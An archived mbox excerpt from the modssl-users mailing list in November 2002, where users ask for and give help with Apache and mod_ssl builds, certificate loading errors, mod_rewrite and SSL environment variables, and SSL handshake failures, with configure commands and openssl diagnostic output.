Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from eufig1.rit.reuters.com id RAA19854; Wed, 13 Nov 2002 17:33:20 +0100 (MET)
From: Oliver.Koeller@reuters.com
Received: from no.name.available by eufig1.rit.reuters.com
          via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 13 Nov 2002 16:33:20 UT
Received: from eupig1 (unverified) by reuters.com
 (Content Technologies SMTPRS 4.2.1) with ESMTP id  for ;
 Wed, 13 Nov 2002 16:35:58 +0000
Message-ID: 
Received: from eungw2.ime.reuters.com ([10.1.4.30])
 by eupig1.dtc.lon.ime.reuters.com (PMDF V6.1-1 #40186)
 with ESMTP id <0H5I00MGIWMQD9@eupig1.dtc.lon.ime.reuters.com> for
 modssl-users@modssl.org; Wed, 13 Nov 2002 16:32:50 +0000 (GMT)
Date: Wed, 13 Nov 2002 17:29:40 +0100
Subject: Re: Please, I need aid
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org
MIME-version: 1.0
X-Mailer: Lotus Notes Release 5.0.6a  January 17, 2001
Content-type: text/plain; charset="us-ascii"
X-MIMETrack: Serialize by Router on EUNGW2/LON/GB/Reuters(Release 5.0.6a
 |January 17, 2001) at 13/11/2002 16:23:24
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Oliver.Koeller@reuters.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


in ssl.conf, try to change

to




                                                                                                                         
                    mb3@ati.es                                                                                           
                    Sent by:                  To:      modssl-users@modssl.org                                           
                    owner-modssl-users@       cc:                                                                        
                    modssl.org                 Subject:     Please, I need aid                                           
                                               Header:      Internal Use Only                                            
                                                                                                                         
                    13.11.2002 11:31                                                                                     
                    Please respond to                                                                                    
                    modssl-users                                                                                         
                                                                                                                         
                                                                                                                         



Hello,

I'm an Spanish technicien, and my name is Marc Bartres.
Please excuse for my english first.

I've a problem installing Apache 2.0.43 ans SSL.
I've downloading this version and the OpenSSL 0.9g version.

The Apache without SSL runs ok.
But when I runs Apache with startssl appears an error of a library: vhost.c of
APR.

I compiled Apache with:
./configure --prefix=/usr/local/apache2 --enable-ssl
make
make install
and I configured httpd.conf with ServerName "the_IP:80" and ssl.conf with
ServerName "the_IP:443".

I put server.key and server.crt in ssl.conf too.

I want a basic secure server and I don't know what's the problem.

I'm testing enabling all modules, but then appears and error on DAV's library.

Please, it's for my work and I'm only in this project. Nobody knows Apache.


Thany you very much.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org






-------------------------------------------------------------- --
        Visit our Internet site at http://www.reuters.com

Get closer to the financial markets with Reuters Messaging - for more
information and to register, visit http://www.reuters.com/messaging

Any views expressed in this message are those of  the  individual
sender,  except  where  the sender specifically states them to be
the views of Reuters Ltd.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 17:40:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA20295; Wed, 13 Nov 2002 17:39:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id RAA20288; Wed, 13 Nov 2002 17:38:52 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gADGcqt9000103
	for ; Wed, 13 Nov 2002 17:38:52 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gADGcpEm013997
	for ; Wed, 13 Nov 2002 17:38:51 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Please, I need aid
Date: Wed, 13 Nov 2002 17:38:51 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393972F6FA@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: Please, I need aid
Thread-Index: AcKLKx+EisXPOe+5QtC/1tahuvf+hQABsfVA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The problem is with your apr libraries. Check out
http://apr.apache.org/.

Rgds,

Owen Boyle

>-----Original Message-----
>From: mb3@ati.es [mailto:mb3@ati.es]
>Sent: Mittwoch, 13. November 2002 11:31
>To: modssl-users@modssl.org
>Subject: Please, I need aid
>
>
>Hello,
>
>I'm an Spanish technicien, and my name is Marc Bartres.
>Please excuse for my english first.
>
>I've a problem installing Apache 2.0.43 ans SSL.
>I've downloading this version and the OpenSSL 0.9g version.
>
>The Apache without SSL runs ok.
>But when I runs Apache with startssl appears an error of a 
>library: vhost.c of 
>APR.
>
>I compiled Apache with:
>./configure --prefix=/usr/local/apache2 --enable-ssl
>make
>make install
>and I configured httpd.conf with ServerName "the_IP:80" and 
>ssl.conf with 
>ServerName "the_IP:443".
>
>I put server.key and server.crt in ssl.conf too.
>
>I want a basic secure server and I don't know what's the problem.
>
>I'm testing enabling all modules, but then appears and error 
>on DAV's library.
>
>Please, it's for my work and I'm only in this project. Nobody 
>knows Apache.
>
>
>Thany you very much.
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 17:41:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA20342; Wed, 13 Nov 2002 17:40:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.tiscali.it id RAA20292; Wed, 13 Nov 2002 17:39:06 +0100 (MET)
From: ennio.salemi@tiscali.it
Received: from [193.55.113.196] by mail.tiscali.it with HTTP; Wed, 13 Nov 2002 17:38:58 +0100
Date: Wed, 13 Nov 2002 17:38:58 +0100
Message-ID: <3DD0C85200003571@mail-5.tiscalinet.it>
In-Reply-To:  <1037183483.3dd229fb2c817@intranet.ati.es>
Subject: RE: Please, I need aid
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA20338
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ennio.salemi@tiscali.it
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Download "httpd-docs.pdf" from the apache website and follow the instructions...i've
done in this way..and there are no problems!!
Ennio
>-- Messaggio Originale --
>From: mb3@ati.es
>To: modssl-users@modssl.org
>Subject: Please, I need aid
>Date: Wed, 13 Nov 2002 11:31:23 +0100 (CET)
>Reply-To: modssl-users@modssl.org
>
>
>Hello,
>
>I'm an Spanish technicien, and my name is Marc Bartres.
>Please excuse for my english first.
>
>I've a problem installing Apache 2.0.43 ans SSL.
>I've downloading this version and the OpenSSL 0.9g version.
>
>The Apache without SSL runs ok.
>But when I runs Apache with startssl appears an error of a library: vhost.c
>of 
>APR.
>
>I compiled Apache with:
>./configure --prefix=/usr/local/apache2 --enable-ssl
>make
>make install
>and I configured httpd.conf with ServerName "the_IP:80" and ssl.conf with
>
>ServerName "the_IP:443".
>
>I put server.key and server.crt in ssl.conf too.
>
>I want a basic secure server and I don't know what's the problem.
>
>I'm testing enabling all modules, but then appears and error on DAV's library.
>
>Please, it's for my work and I'm only in this project. Nobody knows Apache.
>
>
>Thany you very much.
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org


__________________________________________________________________
Tiscali Ricaricasa
la prima prepagata per navigare in Internet a meno di un'urbana e
risparmiare su tutte le tue telefonate. Acquistala on line e non avrai
nessun costo di attivazione né di ricarica!
http://ricaricasaonline.tiscali.it/



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 17:45:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA20573; Wed, 13 Nov 2002 17:44:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA20529; Wed, 13 Nov 2002 17:43:26 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B53BB4CE76C; Wed, 13 Nov 2002 17:43:29 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A565D286B8; Wed, 13 Nov 2002 17:42:10 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sfoexh01.yipes.com id QAA17597; Wed, 13 Nov 2002 16:48:06 +0100 (MET)
Received: by sfoexh01.yipes.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 13 Nov 2002 07:47:54 -0800
Message-ID: <9C67F3C3FD4F3A43BB64A7C60871DC3F31D178@sfoexh01.yipes.com>
From: David Loesche 
To: "'modssl-users@modssl.org'" 
Subject: RE: Please, I need aid
Date: Wed, 13 Nov 2002 07:47:53 -0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Loesche 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is the config I used on a test environment that works for Solaris 8
(this includes the new multi-threaded capabilities).

#!/bin/ksh
PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin
LD_LIBRARY_PATH=/usr/local/lib:/opt/ssl/lib:/usr/lib
export PATH LD_LIBRARY_PATH

SSL_BASE=/opt/ssl \
LIBS=/usr/lib/libC.so.5 \
CFLAGS=-fPIC \

./configure     --prefix=/opt/apache \
                --enable-ssl \
                --with-ssl=/opt/ssl/ \
                --enable-so \
                --with-mpm=worker \
                --enable-deflate

David S. Loesche
david.loesche@yipes.com			Yipes Enterprise Services, Inc.
Main: 	(415) 901-2000 			114 Sansome Street, Suite 1045
Direct: 	(415) 901-2210			San Francisco, CA 94104
Fax: 	(415) 901-2201			http://www.yipes.com

Yipes is the defining provider of fully scalable bandwidth for businesses.
We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps increments. 

Yipes delivers this uniquely flexible service over the first nationwide
system of optical IP networks.


-----Original Message-----
From: mb3@ati.es [mailto:mb3@ati.es]
Sent: Wednesday, November 13, 2002 2:31 AM
To: modssl-users@modssl.org
Subject: Please, I need aid

Hello,

I'm an Spanish technicien, and my name is Marc Bartres.
Please excuse for my english first.

I've a problem installing Apache 2.0.43 ans SSL.
I've downloading this version and the OpenSSL 0.9g version.

The Apache without SSL runs ok.
But when I runs Apache with startssl appears an error of a library: vhost.c
of
APR.

I compiled Apache with:
./configure --prefix=/usr/local/apache2 --enable-ssl
make
make install
and I configured httpd.conf with ServerName "the_IP:80" and ssl.conf with
ServerName "the_IP:443".

I put server.key and server.crt in ssl.conf too.

I want a basic secure server and I don't know what's the problem.

I'm testing enabling all modules, but then appears and error on DAV's
library.

Please, it's for my work and I'm only in this project. Nobody knows Apache.


Thany you very much.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 18:57:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA23334; Wed, 13 Nov 2002 18:56:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtprelay9.dc2.adelphia.net id SAA23287; Wed, 13 Nov 2002 18:55:23 +0100 (MET)
Received: from bingo ([68.69.143.53]) by
          smtprelay9.dc2.adelphia.net (Netscape Messaging Server 4.15)
          with SMTP id H5J0G001.G3D for ; Wed, 13
          Nov 2002 12:55:12 -0500 
Content-Type: text/plain;
  charset="iso-8859-1"
From: Ed Loehr 
Subject: bad end line:pem_lib.c:762
Date: Wed, 13 Nov 2002 10:55:11 -0700
X-Mailer: KMail [version 1.2]
MIME-Version: 1.0
Message-Id: <0211131055010T.06481@bingo>
Content-Transfer-Encoding: 8bit
To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed Loehr 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I just received a new cert from Verisign via email for use in Apache 
1.3.27 with mod_ssl-2.8.12-1.3.27.  When I cut-n-paste it into a file 
(server.cert) and attempt to verify it matches the server key and CSR 
by comparing md5 sums, I get the following error:

$ openssl x509 -noout -modulus -in server.cert | openssl md5
unable to load certificate
26567:error:0906D066:PEM routines:PEM_read_bio:bad end 
line:pem_lib.c:762:
d41d8cd98f00b204e9800998ecf8427e

I've looked at the cert and it looks identical in form to the 
snakeoil certs that come with Apache/modssl.  This is with openssl 
0.9.6g.

Any clues?

Regards,
Ed Loehr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 19:22:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA24761; Wed, 13 Nov 2002 19:21:20 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id TAA24748; Wed, 13 Nov 2002 19:20:21 +0100 (MET)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c58line114.dialup3.ctm.net [202.175.44.115])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id BAA29539;
	Thu, 14 Nov 2002 01:59:39 +0800
Message-ID: <3DD297A5.3E3E8191@ita.org.mo>
Date: Thu, 14 Nov 2002 02:19:17 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: mod_ssl , OpenSSL 
Subject: Certificate Authority
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

What different between Certificate Authority and Root Certificate
Authority ?

Thank for your telling !

Edward.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 20:25:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26566; Wed, 13 Nov 2002 20:24:08 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA26553; Wed, 13 Nov 2002 20:23:42 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C780B4CE747; Wed, 13 Nov 2002 20:23:46 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id AB52D286B8; Wed, 13 Nov 2002 20:22:06 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtprelay6.dc2.adelphia.net id SAA23244; Wed, 13 Nov 2002 18:51:08 +0100 (MET)
Received: from bingo ([68.69.143.53]) by
          smtprelay6.dc2.adelphia.net (Netscape Messaging Server 4.15
          smtprelay6 Dec  7 2001 09:58:59) with SMTP id H5J09003.J5L for
          ; Wed, 13 Nov 2002 12:51:00 -0500 
Content-Type: text/plain;
  charset="iso-8859-1"
From: Ed Loehr 
Organization: Loehr Technologies
To: modssl-users@modssl.org
Subject: bad end line:pem_lib.c:762
Date: Wed, 13 Nov 2002 10:50:59 -0700
X-Mailer: KMail [version 1.2]
MIME-Version: 1.0
Message-Id: <0211131050590S.06481@bingo>
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed Loehr 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I just received a new cert from Verisign via email for use in Apache 
1.3.27 with mod_ssl-2.8.12-1.3.27.  When I cut-n-paste it into a file 
(server.cert) and attempt to verify it matches the server key and CSR 
by comparing md5 sums, I get the following error:

$ openssl x509 -noout -modulus -in server.cert | openssl md5
unable to load certificate
26567:error:0906D066:PEM routines:PEM_read_bio:bad end 
line:pem_lib.c:762:
d41d8cd98f00b204e9800998ecf8427e

I've looked at the cert and it looks identical in form to the 
snakeoil certs that come with Apache/modssl.  This is with openssl 
0.9.6g.

Any clues?

Regards,
Ed Loehr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 13 20:43:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA27659; Wed, 13 Nov 2002 20:42:25 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtprelay9.dc2.adelphia.net id UAA27607; Wed, 13 Nov 2002 20:41:41 +0100 (MET)
Received: from bingo ([68.69.143.53]) by
          smtprelay9.dc2.adelphia.net (Netscape Messaging Server 4.15)
          with SMTP id H5J5D902.Q7O for ; Wed, 13
          Nov 2002 14:41:33 -0500 
Content-Type: text/plain;
  charset="iso-8859-1"
From: Ed Loehr 
To: modssl-users@modssl.org
Subject: Re: bad end line:pem_lib.c:762
Date: Wed, 13 Nov 2002 12:41:33 -0700
X-Mailer: KMail [version 1.2]
References: <0211131055010T.06481@bingo>
In-Reply-To: <0211131055010T.06481@bingo>
MIME-Version: 1.0
Message-Id: <0211131241330Z.06481@bingo>
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed Loehr 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wednesday 13 November 2002 12:17 pm, you wrote:
>
> $ openssl x509 -noout -modulus -in server.cert | openssl md5
> unable to load certificate
> 26567:error:0906D066:PEM routines:PEM_read_bio:bad end
> line:pem_lib.c:762:
> d41d8cd98f00b204e9800998ecf8427e


D'oh!  An unfaithful cut-n-paste added an extraneous space and left 
out a newline at the end. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 02:26:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA15734; Thu, 14 Nov 2002 02:25:19 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from typhoon.enabled.com id CAA15724; Thu, 14 Nov 2002 02:24:24 +0100 (MET)
Received: from typhoon.enabled.com (localhost.enabled.com [127.0.0.1])
	by typhoon.enabled.com (8.12.6/8.12.6) with ESMTP id gAE1NGuR042515
	for ; Wed, 13 Nov 2002 17:23:17 -0800 (PST)
	(envelope-from sleek@enabled.com)
Received: from localhost (sleek@localhost)
	by typhoon.enabled.com (8.12.6/8.12.2/Submit) with ESMTP id gAE1N6tA042512
	for ; Wed, 13 Nov 2002 17:23:06 -0800 (PST)
	(envelope-from sleek@enabled.com)
X-Authentication-Warning: typhoon.enabled.com: sleek owned process doing -bs
Date: Wed, 13 Nov 2002 17:23:06 -0800 (PST)
From: Noah Garrett Wallach 
To: modssl-users@modssl.org
Subject: modssl not running properly
Message-ID: <20021113171538.C42365-100000@typhoon.enabled.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah Garrett Wallach 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


HI,

okay I just installed modssl apache on my freeBSD 4.7 STABLE box from the
/usr/ports directory.  I am not able to go to the secure webserver that I
defined in the httpsd.conf file.  Anybody want to help me figure out how
to cure this issue?

- Noah



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 10:05:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA01936; Thu, 14 Nov 2002 10:04:57 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA01899; Thu, 14 Nov 2002 10:03:07 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C1A944CE78E; Thu, 14 Nov 2002 10:03:09 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D2917287B3; Thu, 14 Nov 2002 09:56:46 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from tumbleweed id CAA16391; Thu, 14 Nov 2002 02:35:09 +0100 (MET)
Received: from 192.168.3.10 by tumbleweed with ESMTP (WorldSecure Server
 SMTP Relay(WSS) v4.5); Wed, 13 Nov 2002 20:35:33 -0500
X-Server-Uuid: 25a6c030-5ea1-11d6-beb9-0050bab0e8a4
Received: from CGI00916 ([192.168.3.56]) by
 accord.mail.teambellesdi2003.com with SMTP (Microsoft Exchange Internet
 Mail Service Version 5.5.2653.13) id 4H8WSNA9; Wed, 13 Nov 2002 20:40:
 12 -0500
Message-ID: <004c01c28b7e$36b3ac00$3803a8c0@teambellesdi2003.com>
From: "Harry Yu" 
To: modssl-users@modssl.org
Subject: Can I get SSL_CLIENT_S_DN_CN within Rewrite Module?
Date: Wed, 13 Nov 2002 20:36:11 -0500
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-WSS-ID: 11CC226F75586-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Harry Yu" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear expert:

We are trying to get the SSL_CLIENT_S_DN_CN from client certificate
and put it into request as a quary string by using RewriteRule, but we could
not
rewrite it and always get empty quary string. The config is as following:

SSLOptions +StdEnvVars

RewriteEngine On
RewriteOptions inherit
RewriteLog logs/rewrite.log
RewriteLogLevel 9
#RewriteRule ^/esdi/pat$ /esdi/pat?SSL_CLIENT_S_DN_CN=%{SSL_CLIENT_S_DN_CN}
#RewriteCond %{HTTP_USER_AGENT} ^Mozilla.*
#RewriteCond %{ENV:SSL_CLIENT_S_DN_CN} ^(.*)$
RewriteCond %{ENV:SSL_CLIENT_S_DN_CN} (.*)
RewriteRule ^/esdi/pat$ - [E=ID:%1,C]
RewriteRule ^/esdi/pat$ /esdi/pat?pat-id=%{ENV:ID} [L]

Can I get environment varable like SSL_CLIENT_XXX within Rewrite Module, I
have no problem
to get %{SERVER_NAME} and rewrite it into quary string.

Is it correct? Hope to get your help soon. Thanks in advance!

Harry Yu

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 10:06:37 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA01963; Thu, 14 Nov 2002 10:05:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA01897; Thu, 14 Nov 2002 10:03:07 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id AEC954CE78C; Thu, 14 Nov 2002 10:03:09 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E725C286BA; Thu, 14 Nov 2002 09:56:34 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mailcity.com id CAA14106; Thu, 14 Nov 2002 02:07:37 +0100 (MET)
Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Thu, 14 Nov 2002 01:07:13 -0000
To: modssl-users@modssl.org
Date: Wed, 13 Nov 2002 17:07:13 -0800
From: "Jeroen Wilms" 
Message-ID: 
Mime-Version: 1.0
X-Sent-Mail: on
X-Mailer: MailCity Service
X-Priority: 3
Subject: SSL23_WRITE:ssl handshake failure
X-Sender-Ip: 203.163.64.81
Organization: Lycos Mail  (http://www.mail.lycos.com:80)
Content-Type: text/plain; charset=us-ascii
Content-Language: en
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeroen Wilms" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have just configured OpenSSL 0.9.5a for Apache/1.3.12 (Unix) and modssl 2.6.4. The server works fine for HTTP communication but I cannot establish a connection to the HTTPS port. I used the openssl s_client utility to trace the connection and attached the results below.

My question is how do I track down the cause of this problem ? 

Regards,
Jeroen

I run the following command:

openssl s_client -connect myhostname:7443 -state -debug

and receive the following output:

CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 2006BB28 [2006BB98] (112 bytes => 112 (0x70))
0000 - 80 6e 01 03 01 00 45 00-00 00 20 00 00 16 00 00   .n....E... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 01 00 80 08 00 80 00 00-65 00 00 64 00 00 63 00   ........e..d..c.
0030 - 00 62 00 00 60 00 00 15-00 00 12 00 00 09 06 00   .b..`...........
0040 - 40 00 00 14 00 00 11 00-00 08 00 00 03 02 00 80   @...............
0050 - a4 4b 41 ee 82 78 39 4e-22 72 89 24 c7 48 93 96   .KA..x9N"r.$.H..
0060 - 3f 7a 00 2e 6f 30 99 8f-99 6a 17 4d ed cc d0 b1   ?z..o0...j.M....
SSL_connect:SSLv2/v3 write client hello A
read from 2006BB28 [200710F8] (7 bytes => 0 (0x0))
23498:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure:s23_lib.c:21
6:

I note that the line starting with "read from 2006BB28..." appears to me to attempt to read 7 bytes, but the data returned is 0 bytes. This then leads to the error message stating an ssl handshake failure.




__________________________________________________________
Outgrown your current e-mail service? Get 25MB Storage, POP3 Access,
Advanced Spam protection with LYCOS MAIL PLUS.
http://login.mail.lycos.com/brandPage.shtml?pageId=plus&ref=lmtplus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 14:01:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA16364; Thu, 14 Nov 2002 14:00:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA16191; Thu, 14 Nov 2002 13:59:17 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 63D694CE76B; Thu, 14 Nov 2002 13:59:21 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id EA3AF286AD; Thu, 14 Nov 2002 13:58:22 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp01ffm.de.uu.net id LAA07783; Thu, 14 Nov 2002 11:25:51 +0100 (MET)
Received: from Iapetos.csfps.de (Iapetos.csfps.de [192.54.46.103])
	by smtp01ffm.de.uu.net (8.9.3/5.5.5) with ESMTP id LAA17462
	for ; Thu, 14 Nov 2002 11:25:49 +0100 (MET)
Received: from mailhost.teknon.de by Iapetos.csfps.de for modssl-users@modssl.org with ESMTP id gAEAPkQ15398; Thu, 14 Nov 2002 11:25:47 +0100 (MET)
